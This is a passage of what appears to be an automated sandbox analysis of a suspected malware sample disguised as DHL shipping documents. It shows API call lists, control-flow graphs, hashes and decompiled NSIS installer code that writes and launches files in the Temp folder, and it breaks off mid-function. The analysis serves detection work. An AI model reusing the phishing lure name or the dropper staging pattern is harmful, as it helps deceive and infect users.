                        • DestroyWindow.USER32 ref: 00404160
                        • SetWindowLongW.USER32 ref: 00404179
                        • GetDlgItem.USER32 ref: 00404198
                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                        • IsWindowEnabled.USER32(00000000), ref: 004041B3
                        • GetDlgItem.USER32 ref: 0040425E
                        • GetDlgItem.USER32 ref: 00404268
                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                        • GetDlgItem.USER32 ref: 00404379
                        • ShowWindow.USER32(00000000,?), ref: 0040439A
                        • EnableWindow.USER32(?,?), ref: 004043AC
                        • EnableWindow.USER32(?,?), ref: 004043C7
                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                        • EnableMenuItem.USER32 ref: 004043E4
                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                        • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                        • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                        • ShowWindow.USER32(?,0000000A), ref: 00404581
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                        • String ID: H7B
                        • API String ID: 2475350683-2300413410
                        • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                        • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                        • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                        • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                        C-Code - Quality: 96%
                        			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                        0x00403d1d
                        0x00403d26
                        0x00403d2d
                        0x00403d2f
                        0x00403d43
                        0x00403d55
                        0x00403d5e
                        0x00403d67
                        0x00403d6e
                        0x00403d73
                        0x00403d7a
                        0x00403d8d
                        0x00403d8d
                        0x00403d98
                        0x00403d31
                        0x00403d3c
                        0x00403d3c
                        0x00403d9d
                        0x00403da7
                        0x00403db0
                        0x00403db5
                        0x00403dc6
                        0x00403e58
                        0x00403e60
                        0x00403e69
                        0x00403e69
                        0x00403e7f
                        0x00403e85
                        0x00403e93
                        0x00403f14
                        0x00403f1c
                        0x00403f26
                        0x00403f2b
                        0x00403f31
                        0x00403fbb
                        0x00403fc0
                        0x00403fc2
                        0x00403fde
                        0x00000000
                        0x00403fde
                        0x00403fc4
                        0x00403fca
                        0x00403fd2
                        0x00403fd2
                        0x00000000
                        0x00403fca
                        0x00403f3f
                        0x00403f4a
                        0x00403f4f
                        0x00403f51
                        0x00403f58
                        0x00403f58
                        0x00403f63
                        0x00403f6b
                        0x00403f6d
                        0x00403f6f
                        0x00403f78
                        0x00403f7b
                        0x00403f81
                        0x00403f81
                        0x00403fa0
                        0x00403fb1
                        0x00000000
                        0x00403fb6
                        0x00403f1e
                        0x00403f20
                        0x00000000
                        0x00403e95
                        0x00403e95
                        0x00403ea1
                        0x00403eab
                        0x00403eb1
                        0x00403eb6
                        0x00403ec5
                        0x00403fe3
                        0x00403fe3
                        0x00000000
                        0x00403fe3
                        0x00403ed4
                        0x00403f0f
                        0x00000000
                        0x00403f0f
                        0x00403dcc
                        0x00403dcc
                        0x00403dcf
                        0x00403dd1
                        0x00000000
                        0x00000000
                        0x00403ddf
                        0x00403df1
                        0x00403df6
                        0x00403dff
                        0x00000000
                        0x00000000
                        0x00403e05
                        0x00403e07
                        0x00403e14
                        0x00403e14
                        0x00403e1d
                        0x00403e23
                        0x00403e4b
                        0x00403e53
                        0x00000000
                        0x00403e35
                        0x00403e36
                        0x00403e3f
                        0x00403e45
                        0x00403e46
                        0x00000000
                        0x00403e46
                        0x00403e41
                        0x00403e43
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403e43
                        0x00403e23

                        APIs
                          • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                          • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                        • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                        • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,?,?,?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74D0FAA0), ref: 00403E18
                        • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,?,?,?,"C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                        • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,?,00000000,?), ref: 00403E36
                        • LoadImageW.USER32 ref: 00403E7F
                          • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                        • RegisterClassW.USER32 ref: 00403EBC
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                        • CreateWindowExW.USER32 ref: 00403F09
                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                        • GetClassInfoW.USER32 ref: 00403F6B
                        • GetClassInfoW.USER32 ref: 00403F78
                        • RegisterClassW.USER32 ref: 00403F81
                        • DialogBoxParamW.USER32 ref: 00403FA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                        • String ID: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                        • API String ID: 1975747703-185731113
                        • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                        • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                        • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                        • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                        C-Code - Quality: 98%
                        			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\hardz\\Desktop", L"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                        0x004030db
                        0x004030de
                        0x004030e1
                        0x004030fb
                        0x00403100
                        0x00403113
                        0x00403118
                        0x0040311e
                        0x00000000
                        0x00403120
                        0x00403131
                        0x00403142
                        0x00403149
                        0x00403151
                        0x00403156
                        0x00403158
                        0x00403243
                        0x00403245
                        0x00403251
                        0x00000000
                        0x00000000
                        0x0040325a
                        0x00403286
                        0x0040328b
                        0x00403296
                        0x00403298
                        0x004032a9
                        0x004032c4
                        0x004032cd
                        0x004032d2
                        0x004032f1
                        0x00403301
                        0x00403313
                        0x00403318
                        0x00403320
                        0x0040332d
                        0x00403335
                        0x0040333a
                        0x0040333c
                        0x0040333c
                        0x00403344
                        0x00403344
                        0x00403347
                        0x00403348
                        0x00403348
                        0x0040334b
                        0x0040334d
                        0x0040334d
                        0x00403357
                        0x00403363
                        0x00000000
                        0x00403368
                        0x00000000
                        0x00403320
                        0x00000000
                        0x004032d4
                        0x00403262
                        0x00403274
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040315e
                        0x00403163
                        0x00403168
                        0x0040316c
                        0x00403173
                        0x0040317a
                        0x0040317c
                        0x0040317c
                        0x00403187
                        0x004032e0
                        0x00403322
                        0x00000000
                        0x00403322
                        0x00403194
                        0x00403214
                        0x00403218
                        0x0040321d
                        0x00000000
                        0x00403214
                        0x0040319d
                        0x004031a2
                        0x004031aa
                        0x004031d0
                        0x004031df
                        0x004031e5
                        0x004031ea
                        0x004031f0
                        0x00000000
                        0x00000000
                        0x004031fa
                        0x00403202
                        0x00403205
                        0x0040320a
                        0x0040320c
                        0x0040320c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004031fa
                        0x0040321e
                        0x00403224
                        0x00403230
                        0x00403230
                        0x00403233
                        0x00403239
                        0x00403239
                        0x00403241
                        0x00000000
                        0x00403241

                        APIs
                        • GetTickCount.KERNEL32 ref: 004030E4
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,00000400), ref: 00403100
                          • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 0040615C
                          • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 00403149
                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                        • API String ID: 2803837635-2416835633
                        • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                        • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                        • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                        • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                        C-Code - Quality: 77%
                        			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
